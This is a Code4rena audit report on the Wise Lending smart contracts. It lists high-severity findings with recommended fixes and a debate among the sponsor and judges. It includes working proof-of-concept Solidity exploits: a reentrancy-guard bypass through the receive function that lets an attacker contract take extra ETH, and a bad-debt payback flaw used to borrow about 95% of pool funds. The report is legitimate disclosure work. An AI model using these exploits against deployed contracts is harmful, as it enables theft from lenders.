Wise Lending
Findings & Analysis Report


Table of contents


About C4

Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.

A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.

During the audit outlined in this document, C4 conducted an analysis of the Wise Lending smart contract system written in Solidity. The audit took place between February 21 — March 11, 2024.


37 Wardens contributed reports to Wise Lending:

  1. nonseodion
  2. 0xStalin
  3. Dup1337 (sorrynotsorry and deliriusz)
  4. 0xCiphky
  5. serial-coder
  6. NentoR
  7. Draiakoo
  8. 00xSEV
  9. t0x1c
  10. SBSecurity (Slavcheww and Blckhv)
  11. Matin
  12. JCN
  13. aariiif
  14. Myd
  15. WoolCentaur
  16. Jorgect
  17. AM (StefanAndrei and 0xmatei)
  18. 0x11singh99
  19. DanielArmstrong
  20. cheatc0d3
  21. 0xAnah
  22. dharma09
  23. K42
  24. 0xepley
  25. fouzantanveer
  26. kaveyjoe
  27. foxb868
  28. josephdara
  29. unix515
  30. Mrxstrange
  31. shealtielanz
  32. Rhaydden
  33. 0xhacksmithh
  34. albahaca

This audit was judged by Trust.

Final report assembled by thebrittfactor.


The C4 analysis yielded an aggregated total of 22 unique vulnerabilities. Of these vulnerabilities, 5 received a risk rating in the category of HIGH severity and 17 received a risk rating in the category of MEDIUM severity.

Additionally, C4 analysis included 7 reports detailing issues with a risk rating of LOW severity or non-critical. There were also 6 reports recommending gas optimizations.

All of the issues presented here are linked back to their original finding.


The code under review can be found within the C4 Wise Lending repository, and is composed of 44 smart contracts written in the Solidity programming language and includes 6326 lines of Solidity code.

In addition to the known issues identified by the project team, a Code4rena bot race was conducted at the start of the audit. The winning bot, znBotty from warden Rolezn, generated the Automated Findings report and all findings therein were classified as out of scope.

Severity Criteria

C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.

High-level considerations for vulnerabilities span the following key areas when conducting assessments:

  • Malicious Input Handling
  • Escalation of privileges
  • Arithmetic
  • Gas use

For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.

High Risk Findings (5)

[H-01] Exploitation of the receive Function to Steal Funds

Submitted by 0xCiphky, also found by t0x1c

The WiseLending contract incorporates a reentrancy guard through its syncPool modifier, specifically within the _syncPoolBeforeCodeExecution function. This guard is meant to prevent reentrancy during external calls, such as in the withdrawExactAmountETH function, which processes ETH withdrawals for users.

However, there is currently a way to reset this guard, allowing for potential reentrant attacks during external calls. The WiseLending contract includes a receive function designed to automatically redirect all ETH sent directly to it (apart from transactions from the WETH address) to a specified master address.

To forward the ETH the _sendValue function is used, here the sendingProgress variable (which is used for reentrancy checks) is set to true to denote the start of the transfer process and subsequently reset to false following the completion of the call.

    function _sendValue(
        address _recipient,
        uint256 _amount
        if (address(this).balance < _amount) {
            revert AmountTooSmall();

        sendingProgress = true;

            bool success
        ) = payable(_recipient).call{
            value: _amount

        sendingProgress = false;

        if (success == false) {
            revert SendValueFailed();

As a result, an attacker could bypass an active reentrancy guard by initiating the receive function, effectively resetting the sendingProgress variable. This action clears the way for an attacker to re-enter any function within the contract, even those protected by the reentrancy guard.

Having bypassed the reentrancy protection, let’s see how this vulnerability could be leveraged to steal funds from the contract.

The withdrawExactAmountETH function allows users to withdraw their deposited shares from the protocol and receive ETH, this function also contains a healthStateCheck to ensure post withdrawal a users position is still in a healthy state. Note that this health check is done after the external call that pays out the user ETH, this will be important later on.

The protocol also implements a paybackBadDebtForToken function that allows users to pay off any other users bad debt and receive a 5% incentive for doing so.

To understand how this can be exploited, consider the following example:

  • User A deposits 1 ETH into the protocol.
  • User A borrows 0.5 ETH.
  • User A calls withdrawExactAmountETH to withdraw 1 ETH.

    • User A reenters the contract through the external call.

      • User A resets the reentrancy guard with a direct transfer of 0.001 ETH to the WiseLending contract.
      • Next, User A calls the paybackBadDebtForToken function to settle their own 0.5 ETH loan, which, due to the withdrawal, is now classified as bad debt. This not only clears the debt but also secures 0.5 ETH plus an additional incentive for User A.
    • With the bad debt cleared, the healthStateCheck within the withdrawal function is successfully passed.
  • Consequently, User A manages to retrieve their initial 1 ETH deposit and gain an additional 0.5 ETH (plus the incentive for paying off bad debt).

Proof Of Concept

Testing is done in the WiseLendingShutdownTest file, with ContractA imported prior to executing tests:

// import ContractA
import "./ContractA.sol";
// import MockErc20
import "./MockContracts/MockErc20.sol";

contract WiseLendingShutdownTest is Test {
    ContractA public contractA;

    function _deployNewWiseLending(bool _mainnetFork) internal {
        contractA = new ContractA(address(FEE_MANAGER_INSTANCE), payable(address(LENDING_INSTANCE)));
    function testExploitReentrancy() public {
        uint256 depositValue = 10 ether;
        uint256 borrowAmount = 2 ether;
        vm.deal(address(contractA), 2 ether);

        ORACLE_HUB_INSTANCE.setHeartBeat(WETH_ADDRESS, 100 days);


        uint256 nftId = POSITION_NFTS_INSTANCE.tokenOfOwnerByIndex(address(this), 0);

        LENDING_INSTANCE.depositExactAmountETH{value: depositValue}(nftId);
        LENDING_INSTANCE.borrowExactAmountETH(nftId, borrowAmount);

        MockErc20(WETH_ADDRESS).transfer(address(FEE_MANAGER_INSTANCE), 1 ether);

        // check contractA balance
        uint ethBalanceStart = address(contractA).balance;
        uint wethBalanceStart = MockErc20(WETH_ADDRESS).balanceOf(address(contractA));
        uint totalBalanceStart = ethBalanceStart + wethBalanceStart;
        console.log("totalBalanceStart", totalBalanceStart);

        // deposit using contractA
        LENDING_INSTANCE.depositExactAmountETHMint{value: 2 ether}();

       FEE_MANAGER_INSTANCE._increaseFeeTokens(WETH_ADDRESS, 1 ether);
        // withdraw weth using contractA
        LENDING_INSTANCE.withdrawExactAmount(2, WETH_ADDRESS, 1 ether);

        // approve feemanager for 1 weth from contractA
        MockErc20(WETH_ADDRESS).approve(address(FEE_MANAGER_INSTANCE), 1 ether);

        // borrow using contractA
        LENDING_INSTANCE.borrowExactAmount(2,  WETH_ADDRESS, 0.5 ether);

        // Payback amount

        // withdraw using contractA
        LENDING_INSTANCE.withdrawExactAmountETH(2, 0.99 ether);

        // check contractA balance
        uint ethBalanceAfter = address(contractA).balance;
        uint wethBalanceAfter = MockErc20(WETH_ADDRESS).balanceOf(address(contractA));
        uint totalBalanceAfter = ethBalanceAfter + wethBalanceAfter;
        console.log("totalBalanceAfter", totalBalanceAfter);
        uint diff = totalBalanceAfter - totalBalanceStart;
        assertEq(diff > 5e17, true, "ContractA profit greater than 0.5 eth");
// SPDX-License-Identifier: -- WISE --

pragma solidity =0.8.24;

// import lending and fees contracts
import "./WiseLending.sol";
import "./FeeManager/FeeManager.sol";

contract ContractA {
    address public feesContract;
    address payable public lendingContract;

    address constant WETH_ADDRESS = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;

    constructor(address _feesContract, address payable _lendingContract) payable {
        feesContract = _feesContract;
        lendingContract = _lendingContract;

    fallback() external payable {
        if (msg.sender == lendingContract) {
            // send lending contract 0.01 eth to reset reentrancy flag
            (bool sent, bytes memory data) = lendingContract.call{value: 0.01 ether}("");
            FeeManager(feesContract).paybackBadDebtForToken(2, WETH_ADDRESS, WETH_ADDRESS, 499537556593483218);


This vulnerability allows an attacker to illicitly withdraw funds from the contract through the outlined method. Additionally, the exploit could also work using the contract’s liquidation process instead.

Tools Used



Edit the _sendValue function to include a reentrancy check. This ensures that the reentrancy guard is first checked, preventing attackers from exploiting this function as a reentry point. This will also not disrupt transfers from the WETH address as those don’t go through the _sendValue function.

    function _sendValue(
        address _recipient,
        uint256 _amount
        if (address(this).balance < _amount) {
            revert AmountTooSmall();

	_checkReentrancy(); //add here

        sendingProgress = true;

            bool success
        ) = payable(_recipient).call{
            value: _amount

        sendingProgress = false;

        if (success == false) {
            revert SendValueFailed();

vonMangoldt (Wise Lending) commented via duplicate issue #40:

Good catch but we don’t consider it a high since no userFunds relevant state variables are changed after sending the value. And since such a call would encapsulate the borrowrate check at the end, everything works as planned and it cannot be used to block funds or extract value or drain funds or anything. Still good to add a reentrancy check to receive function just in case.

UPDATE EDIT: Ok, you also submitted a stealing of funds POC we will take a look.

vonMangoldt (Wise Lending) commented via duplicate issue #40:

Seems like this doesn’t endanger users. A user is able to borrow beyond his allowed limit. It’s basically just a flashloan without permission?

Wise Lending commented:

Mitigated here.

[H-02] User can erase their position debt for free

Submitted by Dup1337



Vulnerability details

When the pool token stops being used in the position, the _removePositionData function is called. However, it assumes that poolToken that is passed as a parameter always exists in user token array, which is not always the case. In the case of function FeeManager.paybackBadDebtNoReward(), which indirectly calls _removePositionData, insufficient validation doesn’t check if repay token is in user array, which results in zeroing out information about user debt.


Free elimination of user debt.

Proof of Concept

First, let’s see how MainHelper._removePositionData() works:

    function _removePositionData(
        uint256 _nftId,
        address _poolToken,
        function(uint256) view returns (uint256) _getPositionTokenLength,
        function(uint256, uint256) view returns (address) _getPositionTokenByIndex,
        function(uint256, address) internal _deleteLastPositionData,
        bool isLending
        uint256 length = _getPositionTokenLength(

        if (length == 1) {


        uint8 i;
        uint256 endPosition = length - 1;

        while (i < length) {

            if (i == endPosition) {


            if (_getPositionTokenByIndex(_nftId, i) != _poolToken) {
                unchecked {

            address poolToken = _getPositionTokenByIndex(

            isLending == true
                ? positionLendTokenData[_nftId][i] = poolToken
                : positionBorrowTokenData[_nftId][i] = poolToken;



So, _poolToken sent in parameter is not checked if:

  1. The position consists of only one token. Then the token is removed, no matter if it’s _poolToken or not.
  2. No token was found during the position token iteration. In which case, the last token is removed, no matter if it’s _poolToken or not.

This function is called in MainHelper._corePayback(), which in turn is called in FeeManager.paybackBadDebtNoReward() => WiseLending.corePaybackFeeManager() => WiseLending._handlePayback(). The important factor is that paybackBadDebtNoReward() doesn’t check if position utilizes _paybackToken passed by the caller and allows it to pass any token. The only prerequisite is that badDebtPosition[_nftId] has to be bigger than 0:

    function paybackBadDebtNoReward(
        uint256 _nftId,
        address _paybackToken,
        uint256 _shares
        returns (uint256 paybackAmount)

        if (badDebtPosition[_nftId] == 0) {
            return 0;

        if (WISE_LENDING.getTotalDepositShares(_paybackToken) == 0) {
            revert PoolNotActive();

        paybackAmount = WISE_LENDING.paybackAmount(


		// [...]

With these pieces of information, we can form following attack path:

  1. Prepare a big position that will have be destined to have positive badDebt. For sake of the argument, let’s assume it’s $1M worth of ETH.
  2. Prepare a very small position that will not be incentivized to be liquidated by liquidators, just to achieve non-zero badDebt. This can be done, for example, before significant price update transaction from Chainlink. Then take $1M worth of ETH flashloan and put this as collateral to position, borrowing as much as possible.
  3. Call FeeManager.paybackBadDebtNoReward() on the position with desired position nftId, USDC token address and 0 shares as input params.
  4. Because there is non-zero bad debt, the check will pass, and the logic will finally reach MainHelper._corePayback(). Because repay is 0 shares, the diminishing position size in USDC token will not underflow and position token will be tried to be removed:
    function _corePayback(
        uint256 _nftId,
        address _poolToken,
        uint256 _amount,
        uint256 _shares


        if (userBorrowShares[_nftId][_poolToken] > 0) {

            _nftId: _nftId,
            _poolToken: _poolToken,
            _getPositionTokenLength: getPositionBorrowTokenLength,
            _getPositionTokenByIndex: getPositionBorrowTokenByIndex,
            _deleteLastPositionData: _deleteLastPositionBorrowData,
            isLending: false
  1. Inside _removePositionData, because position length is 1, no checks to confirm if the token address matches will be performed:
        uint256 length = _getPositionTokenLength(

        if (length == 1) {

  1. This means that all information about user borrows are deleted. Meaning, that now system thinks the user has $1M collateral, and no debt. Which means that the attacker just stole the entire borrowed amount.

Add verification if the token that is passed to _removePositionData() exists in user tokens. If not, revert the transaction.

Assessed type

Invalid Validation

vonMangoldt (Wise Lending) commented:

Double checking line of reasoning fails when user deposits large amount and then borrows.

  1. Prepare big position that will have be destined to have positive badDebt. For sake of the argument, let’s assume it’s $1M worth of ETH.
  2. Prepare very small position that will not be incentivized to be liquidated by liquidators, just to achieve non-zero badDebt. This can be done for example before significant price update transaction from Chainlink. Then take $1M worth of ETH flashloan and put this as collateral to position, borrowing as much as possible.
  3. Call FeeManager.paybackBadDebtNoReward() on the position with desired position nftId, USDC token address and 0 shares as input params.
  4. Because there is non-zero bad debt, the check will pass, and and the logic will finally reach MainHelper._corePayback(). Because repay is 0 shares, diminishing position size in USDC token will not underflow, and position token will be tried to be removed:


  1. Ok say big position has nftId = 1.
  2. Ok say small position has nftId = 2.

nftId 2 now takes more collateral and borrows max: then calls paybackBadDebtNoReward with nftId 2.

But since collateral has been deposited and borrowed within non liquidation range (healthstate check active remember),

This line here:


in the beginning will set badDebtPosition[_nft] to 0 meaning it will exit after this line:

if (badDebtPosition[_nftId] == 0) {
    return 0;

and no harm done.

deliriusz (warden) commented:

@Trust - I have provided the coded PoC below. It shows that user is able to steal whole protocol funds, due to wrong algorithm in _removePositionData(). I managed to not use very big position and a single token, which makes this issue even easier to perform.

PoC provided below does the following:

  1. Setup initial state - 2 lenders depositing 100 ETH each, and 1 borrower whose position will have bad debt. For the purpose of this test I chose market crash condition; however, using a small position that will give no incentives to liquidate it will also work.
  2. Position is underwater and is liquidated in order to increase bad debt for user position. This is a prerequisite for being able to trigger bad debt repayment.
  3. When bad debt repayment is triggered for a token that user didn’t use, _removePositionData() removes last token in user borrow tokens. In this case that means that the user doesn’t have any tokens in his debt tokens listed.
  4. User borrows 95% of ALL ETH that the protocol holds. It’s possible, because when performing health check at the end of borrow, all user borrow tokens are iterated through - and remember that we just removed the token.
  5. At the end I verified that the user really got the funds, which proves that the issue is real.
// SPDX-License-Identifier: -- WISE --

pragma solidity =0.8.24;

import "./WiseLendingBaseDeployment.t.sol";

contract DebtClearTest is BaseDeploymentTest {
    address borrower = address(uint160(uint(keccak256("alice"))));
    address lender = address(uint160(uint(keccak256("bob"))));
    address lender2 = address(uint160(uint(keccak256("bob2"))));

    uint256 depositAmountETH = 100 ether; // 10 ether
    uint256 depositAmountToken = 10 ether; // 10 ether
    uint256 borrowAmount = 5e18; // 5 ether

    uint256 nftIdLiquidator; // nftId of lender
    uint256 nftIdLiquidatee; // nftId of borrower

    uint256 debtShares;

    function _setupIndividualTest() internal override {

        // set token value for simple calculations
        MOCK_CHAINLINK_2.setValue(1 ether); // 1 token == 1 ETH
        assertEq(MOCK_CHAINLINK_2.latestAnswer(), MOCK_CHAINLINK_ETH_ETH.latestAnswer());
        // fund lender and borrower
        vm.deal(lender, depositAmountETH);
        vm.deal(lender2, depositAmountETH);
        deal(address(MOCK_WETH), lender, depositAmountETH);
        deal(address(MOCK_ERC20_2), borrower, depositAmountToken * 2);
        deal(address(MOCK_ERC20_1), lender, depositAmountToken * 2);

    function testRemovingToken() public {
                // lender supplies ETH

        nftIdLiquidator = POSITION_NFTS_INSTANCE.mintPosition();

        // deposit 100 ether into the pool
        LENDING_INSTANCE.depositExactAmountETH{value: depositAmountETH}(nftIdLiquidator);


        // prank second provider to make sure that the borrower is able to
        // steal everyone's funds later

        uint nftIdfundsProvider = POSITION_NFTS_INSTANCE.mintPosition();

        // deposit 100 ether into the pool
        LENDING_INSTANCE.depositExactAmountETH{value: depositAmountETH}(nftIdfundsProvider);


        // borrower supplies collateral token and borrows ETH

        MOCK_ERC20_2.approve(address(LENDING_INSTANCE), depositAmountToken * 2);

        nftIdLiquidatee = POSITION_NFTS_INSTANCE.mintPosition();
            block.timestamp + 10 days

        LENDING_INSTANCE.depositExactAmount( // supply collateral

        debtShares = LENDING_INSTANCE.borrowExactAmountETH(nftIdLiquidatee, borrowAmount); // borrow ETH


        // shortfall event/crash occurs. This is just one of the possibilities of achieving bad debt
        // second is maintaining small position that gives no incentive to liquidate it.
        MOCK_CHAINLINK_2.setValue(0.3 ether);

        // borrower gets partially liquidated

        MOCK_WETH.approve(address(LENDING_INSTANCE), depositAmountETH);

            debtShares * 2e16 / 1e18 + 1 


        // global and user bad debt is increased
        uint256 totalBadDebt = FEE_MANAGER_INSTANCE.totalBadDebtETH();
        uint256 userBadDebt = FEE_MANAGER_INSTANCE.badDebtPosition(nftIdLiquidatee);

        assertGt(totalBadDebt, 0); 
        assertGt(userBadDebt, 0);
        assertEq(totalBadDebt, userBadDebt); // user bad debt and global bad debt are the same


        MOCK_ERC20_1.approve(address(LENDING_INSTANCE), type(uint256).max);
        MOCK_ERC20_1.approve(address(FEE_MANAGER_INSTANCE), type(uint256).max);
        MOCK_WETH.approve(address(FEE_MANAGER_INSTANCE), type(uint256).max);
        // check how much tokens the position that will be liquidated has
        uint256 lb = LENDING_INSTANCE.getPositionBorrowTokenLength(

        assertEq(lb, 1);

        uint256 ethValueBefore = SECURITY_INSTANCE.getETHBorrow(

        console.log("ethBefore ", ethValueBefore);

        // **IMPORTANT** this is the core of the issue
        // When bad debt occurs, there are 2 critical checks missing:
        // 1. that the amount to repay is bigger than 0
        // 2. that the token to repay bad debt has the bad debt for user
        // This allows to remove any token from the list of user borrow tokens,
        // because of how finding token to remove algorithm is implemented:
        // it iterates over all the tokens and if it doesn't find matching one
        // until it reaches last, it wrongly assumes that the last token is the
        // one that should be removed.
        // And not checking for amount of repayment allows to skip Solidity underflow 
        // checks on diminishing user bad debt.
            address(MOCK_ERC20_1), // user doesn't have debt in this token

        uint256 ethValueAfter = SECURITY_INSTANCE.getETHBorrow(
        uint256 ethWethValueAfter = SECURITY_INSTANCE.getETHBorrow(
        console.log("ethAfter ", ethValueAfter);

        // assert that the paybackBadDebtNoReward removed token that it shouldn't
        uint256 la = LENDING_INSTANCE.getPositionBorrowTokenLength(
        assertEq(la, 0);

        uint lendingWethBalance = WETH.balanceOf(address(LENDING_INSTANCE));

        console.log("lb ", lendingWethBalance);
        console.log("bb ", borrower.balance);


        // borrow 95% of ALL ETH that the protocol possesses
        // this works, because when calculating health check of a position
        // it iterates through `getPositionBorrowTokenLength()` - and we
        // were able to remove it.
        debtShares = LENDING_INSTANCE.borrowExactAmountETH(nftIdLiquidatee, WETH.balanceOf(address(LENDING_INSTANCE)) * 95 / 100); // borrow ETH

        console.log("lb ", WETH.balanceOf(address(LENDING_INSTANCE)));
        console.log("ba ", borrower.balance);

        // make sure that borrow tokens were not increased
        uint256 la2 = LENDING_INSTANCE.getPositionBorrowTokenLength(
        assertEq(la2, 0);

        // verify that ~95% were taken from the pool and borrower received them
        assertLt(WETH.balanceOf(address(LENDING_INSTANCE)), lendingWethBalance * 6 / 100);
        assertGt(borrower.balance, lendingWethBalance * 94 / 100);

        uint256 ethValueAfter2 = SECURITY_INSTANCE.getETHBorrow(
        console.log("ethAfter2 ", ethValueAfter2);

        // borrowing doesn't increase user borrow
        assertEq(ethValueAfter, ethValueAfter2);

At the end of the test, it’s verified that user is in possession of ~95% of the ETH that was initially deposited to the pool.

Trust (judge) commented:

Confirmed the test passes.

[PASS] testRemovingToken() (gas: 2242360)
  ORACLE_HUB_INSTANCE DEPLOYED AT ADDRESS 0x6D93d20285c95BbfA3555c00f5206CDc1D78a239
  POSITION_NFTS_INSTANCE DEPLOYED AT ADDRESS 0x1b5a405a4B1852aA6F7F65628562Ab9af7e2e2e9
  LATEST RESPONSE 1000000000000000000
  ethBefore  300000000000000000
  ethAfter  300000000000000000
  lb  195100000000000000001
  bb  5000000000000000000
  lb  9755000000000000001
  ba  190345000000000000000
  ethAfter2  300000000000000000

The likelihood/impact are in line with high severity. A POC was not initially provided, but the step by step given is deemed sufficient.

vm06007 (Wise Lending) commented:

@Foon256 or @vonMangoldt - can check this again I think. I’ll check what kind of code change we need to add in order to prevent this scenario.

Foon256 (Wise Lending) commented:

The POC is correct but different from the previous presented attack, which was not possible as @vonMangoldt has shown. I don’t know about the rules in this case, because the POC has been submitted long after the deadline and is a different attack than submitted before.

Trust (judge) commented:

The warden’s identification of the root cause is correct and the severity is correct. If there were different submissions this would have gotten a 50%, but for solo finds there is no mechanism for partial scoring.

Alex the Entreprenerd (Appellate Court lead judge) commented:

Summary of the issue

Due to an incorrect logic, it is possible for a user to have all of their debt forgiven by repaying another bad debt position with a non-existing token.

Alex the Entreprenerd’s (Appellate Court lead judge) input


  1. paybackBadDebtNoReward can be called with non existent paybacktoken.
  2. First poolToken bad debt position will be deleted by default.
  3. Remove position in the original submission is not fully clear, but is implicitly mentioning using _deleteLastPositionBorrowDatafor _removePositionData.
  4. This will forgive the bad debt and break the system.
  5. Was disputed due to this.

This asserts that the attack cannot be done atomically, that’s true.

  1. The original submission explains that, due to generating bad debt.

I believe that the finding has shown a way for bad debt to be forgiven, and that the race condition around “proper” vs “malicious” liquidators is not a major decision factor.

I would like to add that the original submission is passable but should have done a better job at:

  • Using only necessary snippets, with comments and tags.
  • Explain each logical step more simply (A calls B, B is pointer to C, C is doing X).

I believe the root cause and the attack was shown in the original submission and as such believe the finding to be valid and high severity.

hickuphh3’s (judge 2) input

This issue should’ve been accompanied with a POC, then there would be no disambiguity over its validity and severity.

I agree with the judge’s assessment. The warden correctly identified the root cause of lacking input validation of _poolToken, which allows _removePositionData to incorrectly remove borrowed positions, thus erasing that user’s debt.

The severity of this alone is high, as it effectively allows the user to forgo repaying his debt.

I disagree with the statement that the POC is different from the previous presented attack. It is roughly the same as the presented step-by-step walkthrough, with amplified impact: the user is able to borrow more tokens for free subsequently, without having to repay.

Disregarding the POC that was submitted after the audit, IMO, the line-by-line walkthrough sufficiently proved the issue.

LSDan’s (judge 3) Input

I think this one should be held as invalid due to this ruling in Decisions from the inaugural Supreme Court session.

As far as I can see, the swaying information was the POC added after the submission deadline. It doesn’t matter if the issue was technically correct. The quality was not high enough to lead the judge to mark it as satisfactory without the additional information. @Alex The Entreprenerd thoughts?

Alex The Entreprenerd (Appellate Court lead judge) commented: I don’t think the POC added any additional info that was not present in the original submission. Invalid token causes default pop of real token. That was identified in the original submission.

I think the dispute by the sponsor was incorrect as asserting that this cannot be done atomically doesn’t justify the bug of mismatch address causing defaults being forgiven. I think the POC added context over content.

LSDan (judge 3) commented: Apologies guys… didn’t read it carefully enough on the first pass. I’ve re-evaluated and while I don’t like the quality of the original submission and would probably have invalidated it myself, I’m willing to align with the two of you and leave it as high risk. The attack is valid and the nuance is in interpreting rules, not validity.

Additional input from the Sponsor (Requested by the Lead Judge) via discord

Alex The Entreprenerd (Appellate Court lead judge) commented: For issue 215, I’d like to ask you what you think was invalid about the first submission and what’s specifically makes the original submission different from the POC sent after? We understand that the quality of the original submission is sub optimal.

Foon (Wise Lending): Referenced the original comment here.

Alex The Entreprenerd (Appellate Court lead judge) commented: This makes sense as there is no way to attack the protocol in the same tx. However, if the price were to fall, then wouldn’t the attacker be able to apply the attack mentioned in the original submission?

hodldoor (Wise Lending) commented: They will be liquidated beforehand. That why the submittor mentioned it is necessary to create a position which is small hence no incentivize to liquidate. Again, the way described by submittor does not work as pointed out in github and here again.

Alex The Entreprenerd (Appellate Court lead judge) commented: My understanding of the issue is that by specifying a non-existing token for liquidation, the first token is popped without paying for the position debt. Am I missing something about this?

hodldoor (Wise Lending) commented: Not for liquidation.
For payingback edit: paybackBadDebtNoReward only works for positions with bad debt, but bad debt usually accrues with debt and no collateral. Only time it doesn’t is if collateral is so small gas is more expensive than to liquidate beforehand while price from collateral is falling.

Foon (Wise Lending) commented: For payingback bad debt positions with paybackBadDebtNoReward(), we added this feature to be able to remove bad debt from the protocol. User can do it and get a little incentive with paybackBadDebtForToken() or a generous donor. The team can pay it back for free with paybackBadDebtNoReward(). paybackBadDebtForToken() is only possible if there is some collateral left in the bad debt position nft.

hodldoor (Wise Lending) commented: the for free part is technically not needed anymore anyway since we opened paying back for everyone

Alex The Entreprenerd (Appellate Court lead judge) commented: Ok. What do you think changed from the original submission and the POC that makes the finding different?

hodldoor (Wise Lending) commented: You mean the PoC after deadline which is, therefore, not counted? He just manipulates price so that no one has the chance to liquidate. If we look at the point from the poc provided AFTER deadline (invalid therefore anyway), then we conclude it’s an expectedValue question.

Attacker either donates liquidation incentives to liquidators and therefore, loses money (10%). Or gains money if he’s lucky that he doesn’t get liquidated within a 10-20% price difference and gets to call the other function first. So if you think as an attacker the probability that ETH drops 20% in one chainlink update (as far as I know, that has never happened before) or that during a 20% drawdown liquidators don’t get put into a block and this likelihood is bigger than 5% OVERALL then you would make money.

The chance of liquidators not picking up free money I would say is more in the low 0.001% estimation rather than 5%. So on average it’s highly minus -ev to do that.

Alex The Entreprenerd (Appellate Court lead judge) commented: Good points, thank you for your thoughts! What are your considerations about the fact that the attacker could just participate in the MEV race, allowing themselves to either front-run or be the first to self-liquidate as a means to enact the attack?

Shouldn’t the system ideally prevent this scenario from ever being possible?

The Wise Admiral (Wise Lending) commented: I’ll let my devs comment on your question about the attacker participating as a liquidator, but as far as the last part about “shouldn’t the system prevent”

I do not believe our position on this finding is that it’s objectively invalid. In fact, I’m sure we have already patched it for our live code which is already deployed on Arbitrum. Our position is that, per the C4 rules the submission is invalid for this specific competitive audit Feb 19th - March 11th and should not be listed in the findings or receive rewards, as it would be unfair to take away money from the other wardens who did submit findings in the time frame given. That being said, we are willing to accept it as a medium finding as a compromise.

hodldoor (Wise Lending) commented: The attack does not start with liquidating it is stopped by liquidating (including if the attacker liquidates), if it’s in time relating to liquidation incentive vs distance between collateral in debt in percentage. That’s why in a poc you need to manipulate price instantly a great deal without being liquidated (doesn’t matter by whom).


We believe that the dispute from the Sponsor comes from a misunderstanding of the submission which ultimately shows an incorrect logic when dealing with liquidations.

While the specifics of the submission leave a lot to be desired, the original submission did identify the root cause, this root cause can be weaponized in a myriad of ways, and ultimately gives the chance to an underwater borrower to get a long forgiven.

For this reason we believe the finding to be a High Severity finding.

Additional Context by the Lead Judge

We can all agree that a POC of higher quality should have been sent, that said our objective at C4 is to prevent real exploits, over a sufficiently long span of time, dismissing barely passable findings would cause more exploits, which will cause real damage to Projects and People using them as well as taint the reputation of C4 as a place where “No stone is left unturned”.

I would recommend the staff to look into ways to penalize these types of findings (for example, give a bonus to the judge as an extensive amount of time was necessary to prove this finding).

But I fail to see how dismissing this report due to a lack of POC would help the Sponsor and Code4rena over the long term.

Wise Lending commented:

Mitigated here.

[H-03] Incorrect bad debt accounting can lead to a state where the claimFeesBeneficial function is permanently bricked and no new incentives can be distributed, potentially locking pending and future protocol fees in the FeeManager contract

Submitted by JCN, also found by serial-coder, 0xStalin, and Draiakoo

Protocol fees can be collected from the WiseLending contract and sent to the FeeManager contract via the permissionless FeeManager::claimWiseFees function. During this call, incentives will only be distributed for incentive owners if totalBadDebtETH (global bad debt) is equal to 0:


663:        if (totalBadDebtETH == 0) { // @audit: incentives only distributed if there is no global bad debt
665:            tokenAmount = _distributeIncentives( // @audit: distributes incentives for `incentive owners` via `gatheredIncentiveToken` mapping
666:                tokenAmount,
667:                _poolToken,
668:                underlyingTokenAddress
669:            );
670:        }

The fees sent to the FeeManager are then able to be claimed by beneficials via the FeeManager::claimFeesBeneficial function or by incentive owners via the FeeManager::claimIncentives function (if incentives have been distributed to the owners):


284:    function claimIncentives(
285:        address _feeToken
286:    )
287:        public
288:    {
289:        uint256 amount = gatheredIncentiveToken[msg.sender][_feeToken]; // @audit: mapping incremented in _distributeIncentives function
291:        if (amount == 0) {
292:            revert NoIncentive();
293:        }

However, beneficials are only able to claim fees if there is currently no global bad debt in the system (totalBadDebtETH == 0).


689:    function claimFeesBeneficial(
690:        address _feeToken,
691:        uint256 _amount
692:    )
693:        external
694:    {
695:        address caller = msg.sender;
697:        if (totalBadDebtETH > 0) { // @audit: can't claim fees when there is bad debt
698:            revert ExistingBadDebt();
699:        }

Below I will explain how the bad debt accounting logic used during partial liquidations can result in a state where totalBadDebtETH is permanently greater than 0. When this occurs, beneficials will no longer be able to claim fees via the FeeManager::claimFeesBeneficial function and new incentives will no longer be distributed when fees are permissionlessly collected via the FeeManager::claimWiseFees function.

When a position is partially liquidated, the WiseSecurity::checkBadDebtLiquidation function is executed to check if the position has created bad debt, i.e. if the position’s overall borrow value is greater than the overall (unweighted) collateral value. If the post liquidation state of the position created bad debt, then the bad debt is recorded in a global and position-specific state:


405:    function checkBadDebtLiquidation(
406:        uint256 _nftId
407:    )
408:        external
409:        onlyWiseLending
410:    {
411:        uint256 bareCollateral = overallETHCollateralsBare(
412:            _nftId
413:        );
415:        uint256 totalBorrow = overallETHBorrowBare(
416:            _nftId
417:        );
419:        if (totalBorrow < bareCollateral) { // @audit: LTV < 100%
420:            return;
421:        }
423:        unchecked {
424:            uint256 diff = totalBorrow
425:                - bareCollateral;
427:            FEE_MANAGER.increaseTotalBadDebtLiquidation( // @audit: global state, totalBadDebtETH += diff
428:                diff
429:            );
431:            FEE_MANAGER.setBadDebtUserLiquidation( // @audit: position state, badDebtPosition[_nftId] = diff
432:                _nftId,
433:                diff
434:            );
435:        }
436:    }


77:    function _setBadDebtPosition(
78:        uint256 _nftId,
79:        uint256 _amount
80:    )
81:        internal
82:    {
83:        badDebtPosition[_nftId] = _amount; // @audit: position bad debt set
84:    }
86:    /**
87:     * @dev Internal increase function for global bad debt amount.
88:     */
89:    function _increaseTotalBadDebt(
90:        uint256 _amount
91:    )
92:        internal
93:    {
94:        totalBadDebtETH += _amount; // @audit: total bad debt incremented

As we can see above, the method by which the global and position’s state is updated is not consistent (total debt increases, but position’s debt is set to recent debt). Since liquidations can be partial, a position with bad debt can undergo multiple partial liquidations and each time the totalBadDebtETH will be incremented. However, the badDebtPosition for the position will only be updated with the most recent bad debt that was recorded during the last partial liquidation. Note that due to the condition on line 419 of WiseSecurity::checkBadDebtLiquidation, the badDebtPosition will be reset to 0 when totalBorrow == bareCollateral (LTV == 100%). However, in this case, any previously recorded bad debt for the position will not be deducted from the totalBadDebtETH. Lets consider two examples:

